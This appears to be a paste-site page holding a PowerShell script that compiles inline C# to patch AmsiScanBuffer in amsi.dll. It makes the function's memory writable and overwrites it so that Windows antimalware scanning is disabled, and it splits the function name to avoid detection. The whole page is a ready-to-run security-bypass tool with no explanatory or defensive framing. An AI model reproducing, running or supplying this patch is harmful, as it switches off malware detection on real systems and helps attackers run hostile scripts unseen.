SHOW:
|
|
- or go back to the newest paste.
| 1 | $Ref = ( | |
| 2 | "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", | |
| 3 | "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" | |
| 4 | ) | |
| 5 | ||
| 6 | $Source = @" | |
| 7 | using System; | |
| 8 | using System.Runtime.InteropServices; | |
| 9 | ||
| 10 | namespace Bypass | |
| 11 | {
| |
| 12 | public class AMSI | |
| 13 | {
| |
| 14 | [DllImport("kernel32")]
| |
| 15 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| 16 | [DllImport("kernel32")]
| |
| 17 | public static extern IntPtr LoadLibrary(string name); | |
| 18 | [DllImport("kernel32")]
| |
| 19 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
| 20 | ||
| 21 | [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
| |
| 22 | static extern void MoveMemory(IntPtr dest, IntPtr src, int size); | |
| 23 | ||
| 24 | public static int Disable() | |
| 25 | {
| |
| 26 | IntPtr TargetDLL = LoadLibrary("amsi.dll");
| |
| 27 | if (TargetDLL == IntPtr.Zero) { return 1; }
| |
| 28 | ||
| 29 | IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer"); | |
| 30 | if (ASBPtr == IntPtr.Zero) { return 1; }
| |
| 31 | ||
| 32 | UIntPtr dwSize = (UIntPtr)5; | |
| 33 | uint Zero = 0; | |
| 34 | ||
| 35 | if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
| |
| 36 | ||
| 37 | Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
| |
| 38 | IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); | |
| 39 | Marshal.Copy(Patch, 0, unmanagedPointer, 6); | |
| 40 | MoveMemory(ASBPtr, unmanagedPointer, 6); | |
| 41 | ||
| 42 | return 0; | |
| 43 | } | |
| 44 | } | |
| 45 | } | |
| 46 | "@ | |
| 47 | ||
| 48 | Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp |
